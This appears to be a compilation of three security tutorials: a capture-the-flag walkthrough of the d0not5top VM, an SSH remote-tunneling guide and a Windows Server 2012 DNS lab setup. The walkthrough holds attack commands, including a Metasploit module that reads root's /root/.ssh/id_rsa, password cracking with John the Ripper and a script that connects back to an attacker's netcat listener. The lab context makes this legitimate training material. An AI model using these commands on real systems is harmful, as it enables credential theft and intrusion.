Hack the d0not5top VM (CTF Challenge)

This time we are going to solve the fun vulnerable lab d0not5top 1.2. To do so, we are going to download the VM from here.
Credit for developing this VM goes to 3mrgnc3, who has hidden 7 flags inside this lab as a challenge for hackers.

Let’s Breach!!!
As always, let us start by finding the IP of the VM (here I have it at 192.168.1.113, but you will have to find your own):

netdiscover


Next we run nmap to identify the services and their versions:
nmap -sV 192.168.1.113


Now, visit the IP in the browser.

Since we didn’t find anything interesting when exploring the IP in the browser, I am now going to scan the web content using dirb in Kali Linux.

dirb http://192.168.1.113


As you can observe from the above image, I have highlighted a URL that points to the control panel of the website, so let’s open 192.168.1.113/control in the browser. Yes, it is a DNS control panel, but I didn’t find any clue for the 1st flag on this web page.


After that, move to its view-source page and notice FL46_1, which indicates the 1st flag.

Wonderful!! Successfully found the 1st flag.


From the dirb scan result we found many web directories on this machine, so next I chose the 192.168.1.113/control/js directory. Here I found a file README.MadBro. It opens as shown below.

Here we found binary code which is to be converted (via decimal) into text. On conversion you will find FL46_2:30931r42q2svdfsxk9i13ry4f2srtr98h2

Great!! Successfully got the 2nd flag.


Now, for the third flag, we will use netcat in very verbose mode on port 25, which hosts the smtpd service (this can be found by doing an aggressive nmap scan on the IP):
nc -vv 192.168.1.113 25
Here we found hexadecimal code which is to be converted into text.


Great!! Successfully got the 3rd flag as well.


On the URL where we found the second flag, there is an instruction written in leet. It reads: M4K3 5UR3 2 S3TUP YOUR /3TC/HO5TS N3XT TIM3 L0053R… 1T’5 D0Not5topMe.ctf!!! So we will go to /etc/hosts and add an entry as shown in the given image.

Now open donot5topme.ctf in the browser as shown and click on Register, given at the end of the web page.


As you can observe, we didn’t find any clue on this web page, so open the view-source page.



In the page source we found this link, as shown in the highlighted text.


Some kind of encoded web page opens, so I searched Google for this encoding. It is known as Brainfuck encoding.

So we will decode it. Here we got FL46_4.

Successfully found the 4th flag.


Now move back to d0not5topme.ctf. We click on Register and then on “I agree to these terms”, which takes us to the registration page. Here we click on Board Administration, which opens a prompt asking which client to use for the mailto link; here I chose Gmail.


Here I found another domain name in the address “Megusta@G4M35.ctf”.



Now let’s add G4M35.ctf into /etc/hosts as we did before and click on Save.


When I opened this domain in the browser, I got a game to play. Although you can get the next clue by playing it too, I thought of a more technical approach: I opened the web page with Inspect Element and selected the Debugger tab. Here I found game.js, and inside the Game_Over script I found the next clue: “/H3X6L4m3”.


Now I opened the complete link “g4m35.ctf/H3X6L4m3”, which gave another new game.


Again we can play and discover the next clue/flag, but we went with a slightly more technical approach and ran a dirb command to look for its directories:

dirb http://g4m35.ctf/H3x6L64m3/ /usr/share/wordlists/dirb/big.txt

From the given result I highlighted http://g4m35.ctf/H3x6L64m3/textures/ for further enumeration.


Now I opened this textures directory in the browser; here I opened the skybox directory and then the dawnclouds directory and found the nz.jpg file, as shown.


Now open this image and get the octal code.


When I decoded this code I found FL46_5.
I had captured the 5th flag as well!!
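The three number-system conversions used so far (binary for flag 2, hexadecimal for flag 3 and octal for flag 5) can be done without an online converter. The bash functions below are an added example, not code from the write-up or from the lab; the sample strings in them are constructed for the demonstration and are not the lab’s real flag data.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): small bash decoders for the
# three number-system encodings used to hide flags 2, 3 and 5. The sample
# strings at the bottom are constructed for the demonstration and are not the
# lab's real flag data.

# Print the character whose code point is $1 (decimal), via an octal escape.
chr() {
  printf "\\$(printf '%03o' "$1")"
}

# Append the character for code point $1 to the caller's variable "out".
# The trailing "x" stops command substitution from eating a decoded newline.
append_char() {
  out+=$(chr "$1"; printf x)
  out=${out%x}
}

# Binary -> text: 8-bit groups, whitespace between groups optional.
bin2text() {
  local bits=${1//[[:space:]]/} out="" i
  for (( i = 0; i < ${#bits}; i += 8 )); do
    append_char "$((2#${bits:i:8}))"
  done
  printf '%s' "$out"
}

# Hex -> text: pairs of hex digits, whitespace and "0x" prefixes optional.
hex2text() {
  local hex=${1//[[:space:]]/} out="" i
  hex=${hex//0x/}
  for (( i = 0; i < ${#hex}; i += 2 )); do
    append_char "$((16#${hex:i:2}))"
  done
  printf '%s' "$out"
}

# Octal -> text: three-digit groups (e.g. 106 for "F"), whitespace optional.
oct2text() {
  local oct=${1//[[:space:]]/} out="" i
  for (( i = 0; i < ${#oct}; i += 3 )); do
    append_char "$((8#${oct:i:3}))"
  done
  printf '%s' "$out"
}

# Constructed demo strings; each one spells "FL46".
bin2text '01000110 01001100 00110100 00110110'; echo
hex2text '0x46 0x4c 0x34 0x36'; echo
oct2text '106 114 064 066'; echo
```

Each decoder strips whitespace first, so the strings can be pasted exactly as they appear on the page (one group per character or one long run). The octal decoder assumes three digits per character, which is how the image in this step presents it; the binary decoder assumes eight bits per character.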


Now get back to the second game http://g4m35.ctf/H3x6L64m3 and open it with Inspect Element. Select the Debugger tab. Here I found Gameplay.js and got another ctf domain, “t3rmln4l.ctf”, as shown below.


Now let’s add t3rmln4l.ctf into /etc/hosts as we did before and click on Save.


As before, when opening this domain in the browser, I got a terminal which asks for a password. After trying a bunch of commands, I found that grep* runs on this terminal, and for authentication I entered the name of the ctf as the password, i.e. t3rm1a4l.ctf, and found another ctf domain, “M36u574.ctf”.


Now let’s add M36u574.ctf also into /etc/hosts as we did before and click on Save.


As before, when you open this domain in the browser you will get a slideshow of Megusta images. Out of the different images I downloaded kingmegusta.jpg.


Now we will run exiftool on this image; here I got some code in the Comment field, as shown below.


Now convert the code to text, which gives the code shown in the image. Copy this code; it is base64 encoded.


Then I created a text file on /root/Desktop (name it anything you want) and pasted the decoded text into this file.


Now run John the Ripper on this file, as shown:
john --wordlist=/usr/share/wordlists/rockyou.txt donotstop
Here I found the user MeGustaKing with the password ********** (ten * characters).


Now using this username and password combination we will log in over SSH. Here we get a code and another username and password combination, i.e. burtieo:Lets you update your FunNotes and more! But first let’s decode that highlighted code.


Copy and paste the above code into the decoder. It is base64 encoded; after decoding it we found that it is an MD5 hash.


Great! It is the 6th flag.


As mentioned above, in the previous SSH login we got the username burtieo, and its password is the text written above it, i.e. Lets you update your FunNotes and more!
Now let’s log in over SSH using the combination
Username: burtieo and Password: Lets you update your FunNotes and more!


This opens an rbash shell, and rbash restricts some of the features of the bash shell.


So, first run the following command:
suedoh -l
And then we run the command:
suedoh /usr/bin/wmstrt


Using the nmap command I found that port 10000 is open.


But this port only remains open for 20 seconds; we can make it stay open longer using a “for loop”, as shown.


Now let’s run Metasploit and use the auxiliary module named file_disclosure:

msf > use auxiliary/admin/webmin/file_disclosure
msf auxiliary(file_disclosure) > set lhost 192.168.1.113
msf auxiliary(file_disclosure) > set ssl true
msf auxiliary(file_disclosure) > set rpath /root/.ssh/id_rsa
msf auxiliary(file_disclosure) > exploit

I found the RSA private key, as shown.

Now copy and paste this private key into a file named id_rsa and then run John the Ripper:
ssh2john id_rsa > ignite
john --wordlist=/usr/share/wordlists/rockyou.txt ignite
This gives the passphrase for root’s key, i.e. “gustateamo”.


Now I restricted the permissions of id_rsa with chmod 700 and logged in over SSH as root with the passphrase gustateamo, as shown below.


Now type the following command:
ls
You can observe from the given image that it consists of two files; let’s open one of them:
cat L45T_fl46.pl
Here it gave the message to use L45T_fl46.pl.


Now use the netcat command to establish a connection with the target through port 1234:
nc -lp 1234 -vv


Now in the D0Not5top terminal we will run the file L45T_fl46.pl with the IP 192.168.0.7 (Kali Linux IP) as given below:
./L45T_fl46.pl 192.168.0.7 1234


On the attacker system you will find that netcat has connected with the target system. The highlighted text points to FL46_7.
Congratulations!! It is the 7th flag.
Solving this lab was a fun and learning experience.


How to Perform Remote Tunneling

Hello friends! Previously we discussed dynamic tunneling and local tunneling, and today we are going to discuss remote tunneling.

Remote tunneling is useful when a client machine wants to access a remote system that lies outside its network.

Example: your personal laptop (at home) is connected to your office server; currently you are working on a client system (at the office) which is connected to the office server. Now, if you want to connect your client system with the laptop in order to read some document, there should be a remote tunnel between them for communication.

Let’s Begin!!
Objective: To establish an HTTP connection between a remote PC and a client on a different network.
Here I have set up my own lab, which consists of three systems in the following network:
SSH server (two Ethernet interfaces)
IP 192.168.0.116 connected to the remote system 192.168.0.100
IP 192.168.10.1 connected to the local network system 192.168.10.2
Ubuntu client (local network system) holds IP 192.168.10.2
Remote system (outside network) holds IP 192.168.0.100


The image below describes the network configuration of the SSH server, showing its two IPs, 192.168.0.116 and 192.168.10.1, as explained above.


Another image given below describes the network configuration of the Ubuntu client, showing IP 192.168.10.2.


Another image given below describes the network configuration of the remote desktop, whose IP is 192.168.0.100.


In this tutorial we are showing HTTP tunneling, and this service is running on port 80 of the XAMPP server (at localhost).
From the given image you can observe that the WordPress website is running on port 80.


At the SSH server we successfully browsed the WordPress website using the URL http://192.168.0.100/index.html and got connected with the remote desktop; since they belong to the same network, they can access each other for communication.

Similarly we tried to connect to the remote desktop from the Ubuntu client through the URL http://192.168.0.100/index.html but failed to browse the WordPress website. Since they belong to different networks, the connection is forbidden here.


Now try to establish a link between the remote desktop and the Ubuntu client using PuTTY.
Use PuTTY to connect to the SSH server (192.168.0.116) via port 22 and follow the steps given below.


Then go to the option SSH > Tunnels in the left-hand Category column and follow the steps given below:
1. Mark the check box for “Local ports accept connections from other hosts”.
2. Give the new forwarded port as 7000 and the connection type as Remote.
3. Give the destination address as 127.0.0.1:80 for establishing the connection, then click on Add.
4. Click on Open when everything is set.


Note: if the SSH service is active on the remote desktop, replace port 80 with port 22, which will create a remote SSH tunnel.


This first establishes the connection between the remote PC and the SSH server, which will act as a link between the remote desktop and the Ubuntu client throughout the communication.


Now open the browser inside the Ubuntu client and again try to connect to the remote desktop using the URL http://192.168.0.116:7000/index.html. This will browse the WordPress website that was running on the localhost of the remote desktop, via the SSH server on port 7000.
Hence we have successfully connected to the remote desktop from the Ubuntu client.
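The PuTTY settings above correspond to a single OpenSSH option, -R. The script below is an added example, not part of the original article, showing the same remote tunnel from the command line as it would be run on the remote desktop (192.168.0.100). It assumes an OpenSSH client on that host and an account named “user” on the SSH server (both assumed, not from the article). One caveat a practitioner should know: for the Ubuntu client to reach the forwarded port, the SSH server’s sshd_config needs GatewayPorts set to yes or clientspecified; otherwise sshd binds port 7000 to 127.0.0.1 on the server only.

```bash
#!/usr/bin/env bash
# Added example, not part of the original article: the OpenSSH equivalent of
# the PuTTY remote-tunnel settings, run on the remote desktop (192.168.0.100).
# Assumptions: an OpenSSH client on that host, an account "user" on the SSH
# server (both assumed), and GatewayPorts yes|clientspecified in the SSH
# server's sshd_config so the listener is not limited to 127.0.0.1.

SSH_SERVER=192.168.0.116   # SSH server, reachable from both networks
SSH_USER=user              # assumed account on the SSH server
LISTEN_PORT=7000           # port the SSH server will listen on (PuTTY "Source port")
TARGET=127.0.0.1           # destination as seen from the remote desktop itself
TARGET_PORT=80             # XAMPP/WordPress; use 22 for the remote SSH tunnel variant

# -R syntax: [bind_address:]port:host:hostport. A 0.0.0.0 bind address asks
# sshd to accept connections from other hosts, the same intent as the PuTTY
# "accept connections from other hosts" checkbox.
remote_forward_spec() {
  local bind_addr=$1 listen_port=$2 target_host=$3 target_port=$4
  printf '%s:%s:%s:%s' "$bind_addr" "$listen_port" "$target_host" "$target_port"
}

# URL the Ubuntu client uses once the tunnel is up.
tunnel_url() {
  local ssh_server=$1 listen_port=$2 path=$3
  printf 'http://%s:%s%s' "$ssh_server" "$listen_port" "$path"
}

# Bring up the tunnel. -N opens no shell, it only forwards; the command blocks
# until interrupted, which is the same as leaving the PuTTY window open.
start_tunnel() {
  ssh -N -R "$(remote_forward_spec 0.0.0.0 "$LISTEN_PORT" "$TARGET" "$TARGET_PORT")" \
      "$SSH_USER@$SSH_SERVER"
}

# Run on the Ubuntu client (192.168.10.2): fetch the HTTP status through the tunnel.
check_from_client() {
  curl -sS -o /dev/null -w '%{http_code}\n' \
      "$(tunnel_url "$SSH_SERVER" "$LISTEN_PORT" /index.html)"
}

case ${1:-} in
  tunnel) start_tunnel ;;
  check)  check_from_client ;;
  *)      echo "usage: $0 {tunnel|check}" >&2 ;;
esac
```

Run it with the argument tunnel on the remote desktop and with check on the Ubuntu client; a 200 from the check confirms the same result the browser screenshot shows. The TARGET_PORT=22 variant gives the remote SSH tunnel mentioned in the note above.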

Setup DNS Penetration testing Lab in Windows Server 2012

The Domain Name System is used to translate names into IP addresses; in other words, it is used for name resolution.
The name exists only for the benefit of humans. It is translated into an IP address to reach the destination. The translation process of a name is called name resolution.
Name resolution proceeds from right to left. There is another "." after com, but it is hidden; this is called the root-level domain. When a request is sent to the root domain for translation, it forwards this request to the com domain, which is called the top-level domain. Com passes the request to the yahoo domain, which is called the second-level domain. Yahoo then sends the request to www, which is called the host name.
The structure of DNS is distributed over the internet. It means that the name resolution task is not assigned to only one computer; rather it is distributed over the internet.

Steps to Install DNS server

Configure the static IP settings of your server; here we assigned IP 192.168.1.104 to our machine, and also set the server’s own IP as the preferred DNS server.



Open Server Manager and click on Add Roles and Features in order to install role services and features. A new window will come up on screen; click on Next, as shown in the image below.


Select the installation type “Role-based or feature-based installation”, which is also the default option, then click on Next for the next step.


Select the desired server from the server pool for the DNS server configuration. From the image below you can observe that one computer, with IP 192.168.1.104, is found inside the pool and has been selected as the server; now click on Next.


Select the DNS Server checkbox as the role to install on the selected server and click on Next.


Now just click on Next after reading the brief description of DNS.


To install the selected role and features on the selected server, click on Install.


The DNS server installation process begins, which may take a few minutes; finally, click on Close once the installation has completed.


That is all about DNS installation; in the next step we will configure the DNS server.

Zone
The database of DNS is called a zone; that is, a partition of the Domain Name Space represented by a domain name is called a zone. When you expand the DNS server node you will see two zone containers: Forward Lookup Zones and Reverse Lookup Zones.
A forward lookup zone takes a name and returns the IP address of the computer.
A reverse lookup zone takes the IP address of the computer and returns its name. Why would we need the name of the computer? The answer is that if a firewall is installed on the computer, the firewall may stop or allow traffic on the basis of name; that is why a reverse lookup zone is used to convert an IP address into a name.
Steps to create a Forward Lookup Zone:
1)      Select DNS from the drop-down list in Server Manager; this opens the server on which we installed the DNS role. Select your server (WIN-KSR8OM147HH), right-click on it and select DNS from that list.


When we select DNS in Server Manager it opens a new window, DNS Manager.
Now we will configure a forward lookup zone as well as a reverse lookup zone. To create a forward lookup zone, select Forward Lookup Zones, right-click on it and select New Zone from the menu to bring up the New Zone Wizard, then click on Next.

It shows the list of different zone types and storage options, such as Primary Zone, Secondary Zone and Stub Zone.


Zone Types

Primary Zone: A primary DNS zone has read/write authority for the DNS server, also known as the master server. It stores the master copy of the zone data in a local file or in AD DS.

Secondary Zone: A secondary DNS zone is a read-only copy of a primary zone; this DNS server is a secondary source of information about the zone.

Active Directory Integrated DNS Zone: This is also a writable zone. To create an Active Directory integrated zone the machine must be a domain controller. The RODC (read-only domain controller) feature is only available in Server 2008 R2. The domain controller must be writable, not read-only, because it is more secure. There is a Security tab in the AD integrated zone; it is multi-master structured. In the case of an AD integrated zone, the DNS database is replicated as part of domain replication.

Stub Zone: It is secondary in nature. It has no database of its own; it loads the database from the master DNS server. It only takes selected records, not the complete database: three record types, NS, SOA and glue A, are transferred into a stub zone. A stub zone is read-only.

DNS uses port 53 for communication, over both TCP and UDP. Dynamic DNS (DDNS) is used to automatically update IP addresses in DNS when they are changed by DHCP. You enable the DDNS option in the zone properties, preferably as secure updates only.


Select Primary zone and click on Next.


Give the desired zone name, like raj, and click on Next.


Save this into a new zone file as raj.dns and click on Next.

Select the “Do not allow dynamic updates” option if you want to update these records manually. Click on Next, then Finish.


Now we have completed the configuration of the forward lookup zone; next we will configure the reverse lookup zone.
Reverse Lookup Zone:
Domain Name System (DNS) servers can enable clients to determine the DNS name of a host based on the host's IP address by providing a special zone called a reverse lookup zone. A reverse lookup zone contains pointer (PTR) resource records that map IP addresses to host names. Some applications, such as secure web applications, rely on reverse lookups.
A reverse lookup takes the form of a question, such as "can you tell me the DNS name of the computer that uses the IP address 192.168.1.120?"
A special domain, the in-addr.arpa domain, was defined in the DNS standards and reserved in the internet DNS namespace to provide a practical and reliable way to perform reverse queries. In a reverse lookup zone the address octets are written in reverse order.
Steps to create a Reverse Lookup Zone:
To create a reverse lookup zone, right-click on Reverse Lookup Zones and click on New Zone in the menu to bring up the New Zone Wizard.


Select Primary zone and click on Next.


Click on the first radio button, IPv4 Reverse Lookup Zone, to translate IP addresses into DNS names, then click on Next.


Type 192.168.1 in the Network ID field, which is the first three octets of the IP address of our DNS server, then click on Next.


Save this in a new zone file (select the first radio button for this step), then click on Next.


Select the “Do not allow dynamic updates” option if you want to update these records manually. Click on Next.


We have successfully completed the configuration of the new reverse lookup zone. Now just click on Finish.


Now you can observe on the right side of the DNS Manager window that the reverse lookup zone is created and contains two records, SOA and NS.

1)      Now we are going to create a new pointer in our new zone file, i.e. 1.168.192.in-addr.arpa, as shown in the image below.


Here we require a host name in order to create the new resource record; click on Browse to select the record.
Resource Records
Resource records are the DNS database entries used to answer DNS client queries. Each record has a name, a type and data. The client query is always shown under the Name column and the DNS server’s answer under the Data column, while the Type column shows the record type. Common records in DNS are A (name to IP), PTR (reverse of A), SRV, MX, NS, SOA, etc.


Select the 2nd file, i.e. the name server (NS) record, as shown in the image below, and click on OK.


DNS Queries
There are two types of queries in DNS:
·         Recursive Query: It goes from a DNS client to a DNS server. Its answer is complete, meaning processing is complete.
·         Iterative Query: It goes from one DNS server to another DNS server. Its answer is not complete, meaning its reply is a referral. An iterative query is used to reach from one DNS server to another. The reply is kept in its cache for 60 minutes.


Verify DNS configuration
Open a command prompt and type the following command, which queries the Domain Name System (DNS) to find the domain name or IP address mapping:
nslookup 192.168.1.104 (server’s IP)
From the image below you can read the name of the NS record/domain name, i.e. raj.

Similarly, using the command nslookup raj we found the host IP, i.e. 192.168.1.104.
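The reverse-order rule behind the zone name 1.168.192.in-addr.arpa, and the two-direction check done with nslookup above, can be scripted. The bash functions below are an added example, not part of the original article: in_addr_arpa builds the in-addr.arpa name for either a full address (the PTR owner name) or a network ID (the zone name), and verify_dns runs the forward, reverse and explicit PTR queries against a chosen server. The server name raj, the address 192.168.1.104 and the host 192.168.1.120 are the article’s own values.

```bash
#!/usr/bin/env bash
# Added example, not part of the original article: build the in-addr.arpa
# name for an IPv4 address or network ID (the "reverse order" rule) and check
# a DNS server in both directions with nslookup, as in the verification step.
# The name "raj" and the addresses used below are the article's lab values.

# Reverse the dotted octets and append the in-addr.arpa suffix.
# Works for a full address (PTR owner name) and for a network ID (zone name).
in_addr_arpa() {
  local IFS=. out="" octet
  for octet in $1; do
    out="$octet${out:+.$out}"
  done
  printf '%s.in-addr.arpa' "$out"
}

# Forward, reverse and explicit PTR queries against a given server.
# Needs network access to the server; nothing here is checked offline.
verify_dns() {
  local server=$1 name=$2 ip=$3
  nslookup "$name" "$server"                              # A record: name -> IP
  nslookup "$ip" "$server"                                # nslookup turns an address into a PTR lookup
  nslookup -type=PTR "$(in_addr_arpa "$ip")" "$server"    # the same PTR query spelled out
}

# Demo on the article's values:
echo "zone for network 192.168.1: $(in_addr_arpa 192.168.1)"
echo "PTR name for 192.168.1.120: $(in_addr_arpa 192.168.1.120)"
# verify_dns 192.168.1.104 raj 192.168.1.104   # run on a host that can reach the lab server
```

The explicit -type=PTR query is useful when a reverse lookup fails: if it returns NXDOMAIN while the A record resolves, the PTR record in the reverse zone is missing or was created under the wrong octet order.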